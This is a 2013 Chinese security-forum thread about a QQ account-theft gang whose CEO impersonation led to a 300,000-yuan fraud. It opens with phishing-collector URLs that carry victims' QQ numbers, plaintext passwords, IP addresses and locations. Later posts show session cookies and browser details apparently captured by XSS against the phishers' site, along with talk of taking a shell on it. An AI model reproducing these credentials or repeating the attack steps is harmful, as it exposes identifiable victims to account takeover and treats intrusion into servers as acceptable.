http://www.hnjfd.net/abc654321/mess.asp?QQNumber=1187661951&QQPassword=198211292113wjw&ip=27.224.45.102&adr=%E4%B8%AD%E5%9B%BD%E7%94%98%E8%82%83%E7%9C%81%E5%BA%86%E9%98%B3%E5%B8%82

http://www.hnjfd.net/aad03hfhk/mess.asp?QQNumber=565911459&QQPassword=13699125590&ip=60.4.177.245&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8C%97%E7%9C%81%E4%BF%9D%E5%AE%9A%E5%B8%82

http://www.hnjfd.net/aab18jism/mess.asp?QQNumber=1136627622&QQPassword=ta638356&ip=219.155.204.92&adr=%E4%B8%AD%E5%9B%BD%E6%B2%B3%E5%8D%97%E7%9C%81%E9%83%91%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/sss49oret/mess.asp?QQNumber=250210294&QQPassword=wqg6863958&ip=112.192.177.93&adr=%E4%B8%AD%E5%9B%BD%E5%9B%9B%E5%B7%9D%E7%9C%81%E4%B9%90%E5%B1%B1%E5%B8%82

http://www.hnjfd.net/aac92tret/mess.asp?QQNumber=277223692&QQPassword=qq786542824&ip=61.183.22.134&adr=%E4%B8%AD%E5%9B%BD%E6%B9%96%E5%8C%97%E7%9C%81%E5%AD%9D%E6%84%9F%E5%B8%82

http://www.hnjfd.net/aac43kiff/mess.asp?QQNumber=1092535504&QQPassword=aiqing861880.&ip=113.134.202.26&adr=%E4%B8%AD%E5%9B%BD%E9%99%95%E8%A5%BF%E7%9C%81%E6%A6%86%E6%9E%97%E5%B8%82

http://www.hnjfd.net/ssa95gdgh/mess.asp?QQNumber=359533934&QQPassword=wz074814&ip=61.153.199.162&adr=%E4%B8%AD%E5%9B%BD%E6%B5%99%E6%B1%9F%E7%9C%81%E5%8F%B0%E5%B7%9E%E5%B8%82

http://www.hnjfd.net/aad29oiyr/mess.asp?QQNumber=442741427&QQPassword=...........com&ip=117.136.38.51&adr=%E4%B8%AD%E5%9B%BD%E5%8C%97%E4%BA%AC%E5%B8%82

http://www.hnjfd.net/aad29oiyr/mess.asp?QQNumber=215955197&QQPassword=13573026729.&ip=117.136.38.51&adr=%E4%B8%AD%E5%9B%BD%E5%8C%97%E4%BA%AC%E5%B8%82

http://www.hnjfd.net/aad29oiyr/mess.asp?QQNumber=532694509&QQPassword=13573026729.abc&ip=117.136.38.51&adr=%E4%B8%AD%E5%9B%BD%E5%8C%97%E4%BA%AC%E5%B8%82

http://www.hnjfd.net/aaa39fddw/mess.asp?QQNumber=1959229937&QQPassword=wl19950808&ip=121.48.203.24&adr=%E4%B8%AD%E5%9B%BD%E5%9B%9B%E5%B7%9D%E7%9C%81%E6%88%90%E9%83%BD%E5%B8%82

http://www.hnjfd.net/aad32yeri/mess.asp?QQNumber=330900234&QQPassword=linjiong888&ip=111.13.1.59&adr=%E4%B8%AD%E5%9B%BD%E5%90%89%E6%9E%97%E7%9C%81%E9%95%BF%E6%98%A5%E5%B8%82

又来一批...骚年.我帮你查了一会.这个盗号集团量挺大啊..不好查.

25#

小贱 (你懂的��������������������) | 2013-12-07 06:25

@only_guest c段么?

26#

嘿嘿嘿嘿1 | 2013-12-07 09:06

@px1624 那是因为人家上了他QQ把他老总的号删除了 然后黑客弄了他自己的号 备注了老总 把图标和个人说明弄得和老总一模一样 他就以为是老总 昨天上午的时候那个QQ发来叫他打款30万 所以就有后面的这样子的

27#

嘿嘿嘿嘿1 | 2013-12-07 09:11

@only_guest 能不能查到具体位置啊 然后告诉警方 。案报了 但是还没有消息

28#

嘿嘿嘿嘿1 | 2013-12-07 09:12

@daige13 9点左右打的钱 ,打完一小时以后报案的 但是还没有消息

29#

再见江南 | 2013-12-07 09:15

@嘿嘿嘿嘿1 看警察的能力了,取钱的地方都有摄像头,要查特别容易,主要看警察愿不愿意查,这骗术老早了,当年还有人找我买QQ去骗钱我没给

30#

嘿嘿嘿嘿1 | 2013-12-07 09:17

@Marsevil 人家老板办事 他也不好过多问的 他跟了老板十多年

31#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-12-07 09:19

。。。。。。

32#

Lee Swagger (Don't report to wooyun) | 2013-12-07 09:39

年底了 30W要是真被盗的话

JCSS想要立功的话应该很快能破案

33#

px1624 (aaaaaaaaa) | 2013-12-07 10:11

@嘿嘿嘿嘿1 。。。现在的QQ不是都有历史消息记录么,一看就有问题的

34#

saber (终极屌丝之路~) | 2013-12-07 10:45

@再见江南 @sdj">sdj 我艹碉堡了。不过怎么是http传输。

35#

嘿嘿嘿嘿1 | 2013-12-07 11:14

@核攻击 求核总帮忙出手下

36#

咖啡 (我的工行密码器每天都要过期一次,我每天都有儿子嫖娼被抓,我每天都中苹果电脑,我房东有健忘症每个月要催好几次房租。) | 2013-12-07 11:37

实在没办法叫你朋友跑路吧

37#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-12-07 14:11

@嘿嘿嘿嘿1 爱莫能助啊~

38#

discovery | 2013-12-07 20:30

哎 惋惜...

39#

Windy (windsay.net) | 2013-12-07 23:52

哎。。

40#

混世魔王 (创新黑产产业) | 2013-12-08 00:09

你朋友真好骗,还有这样的朋友不,求认识。

41#

whirlwind (乌云指定IDC,北京/广东/香港不限内容,五线BGP/10兆独享/4千兆硬防云服务器,QQ493633628,海外服务器请联系Mujj------------------------------------------------------------------------无损音乐网 http://wusunyinyue.cn----------------------月色仍如昔,江上有归帆!-----------------------------) | 2013-12-08 00:14

300万,帮你定位那个黑阔

42#

Kuuki | 2013-12-08 00:36

@only_guest 是C段嗅探到的吗

43#

Noxxx | 2013-12-08 13:30

Date:2013-12-08 13:13:49

OS:Windows 7

Browser:Chrome

REMOTE_ADDR:123.68.126.80

Region:湖南省长沙市铁

HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36

keepsession: 开

title: -

cookie: ASPSESSIONIDCQQACRAS=IFFFIFNBLCPOJFIKPOCOLGBH

toplocation: http://www.hnjfd.net/fe95hdbb/sms.asp

location: http://www.hnjfd.net/fe95hdbb/sms.asp

data:

Client info: Shockwave Flash | pepflashplayer.dll

Chrome Remote Desktop Viewer | internal-remoting-viewer

Native Client | ppGoogleNaClPluginChrome.dll

Chrome PDF Viewer | pdf.dll

Adobe Acrobat | nppdf32.dll

Microsoft Office 2010 | NPAUTHZ.DLL

Microsoft Office 2010 | NPSPWRAP.DLL

360MMPlugin | np360MMPlugIn.dll

360%u5B89%u5168%u536B%u58EB %u5FEB%u901F%u767B%u5F55 | npaxlogin.dll

AliWangWang Plug-In For Firefox and Netscape | npwangwang.dll

AliSSOLogin plugin | npAliSSOLogin.dll

QQ2013 | npactivex.dll

Tenpay Security Control | npqqcert.dll

Tenpay Security Control | npqqedit.dll

Tencent SSO Platform | npSSOAxCtrlForPTLogin.dll

Thunder DapCtrl NPAPI Plugin | npDapCtrl.3.1.0.7.(813).dll

XunLei User Plugin | npxluser2.0.2.3.dll

%u6B6A%u6B6A | npChecker.dll

Intel� Identity Protection Technology | npIntelWebAPIIPT.dll

Intel� Identity Protection Technology | npIntelWebAPIUpdater.dll

PPLive PPTV Plugin | npplugin2.dll

QQMail Plugin | npQQMailWebKit.dll

Tencent FTN plug-in | nptxftnWebKit.dll

QQMusic | npQzoneMusic.dll

npQQPhotoDrawEx | npQQPhotoDrawEx.dll

XunLei Plugin | npxunlei1.0.0.2.dll

Windows Live� Photo Gallery | NPWLPG.dll

npalicdo plugin | npalicdo.dll

BaiduYunGuanjia Application | npYunWebDetect.dll

APlayer ActiveX hosting plugin | npaplayer.dll

Shockwave for Director | np32dsw.dll

Alipay Security Control 3 | npAliSecCtrl.dll

Alipay webmod control | npalidcp.dll

Alipay security control | npaliedit.dll

iTrusChina iTrusPTA,XEnroll,iEnroll,hwPTA,UKeyInstalls Firefox Plugin | NPComBrg701.dll

CFCA npSecEditCtl.BOC.x86 1.0 | npSecEditCtl.BOC.x86.dll

Silverlight Plug-In | npctrl.dll

44#

sdj (男人分三种,第一种是用假名牌来掩饰身份,第二种是用真名牌类衬托身份,而第三种,则是用身份来衬托身上的假名牌。) | 2013-12-08 14:02

location : http://www.hnjfd.net/aad58otrr/sms.asp

toplocation : http://www.hnjfd.net/aad58otrr/sms.asp

cookie : ASPSESSIONIDCQQACRAS=IFFFIFNBLCPOJFIKPOCOLGBH

opener :

HTTP_REFERER : http://www.hnjfd.net/aad58otrr/sms.asp

HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36

REMOTE_ADDR : 123.183.213.218

应该操beef上啊。。

45#

null (#) | 2013-12-08 14:52

企业不做员工安全意识培训的后果

46#

醉入红尘梦 | 2013-12-08 18:08

http://www.hnjfd.net/aad03hfhk/ 这个搞下shell了不

47#

Noxxx | 2013-12-08 23:02

48#

醉入红尘梦 | 2013-12-08 23:12

@Noxxx 求过程,xss?还是C短嗅探?还是走的社工路线?

49#

Noxxx | 2013-12-08 23:15

@醉入红尘梦 xss....

50#

八云幽紫 | 2013-12-09 08:48

以后我被骗了也发上来轮。。。你们的效率简直比公安局还高

51#

Micro Da | 2013-12-09 09:03

膜拜啊...

51#

Micro Da | 2013-12-09 09:03

膜拜啊...

52#

陌路 | 2013-12-09 11:03

虽然能查到ip但是这样的很难搞,看有人已经打骗子登陆ip是湖南这样的80% 都是无线。很难。。希望楼主能遇到个牛X的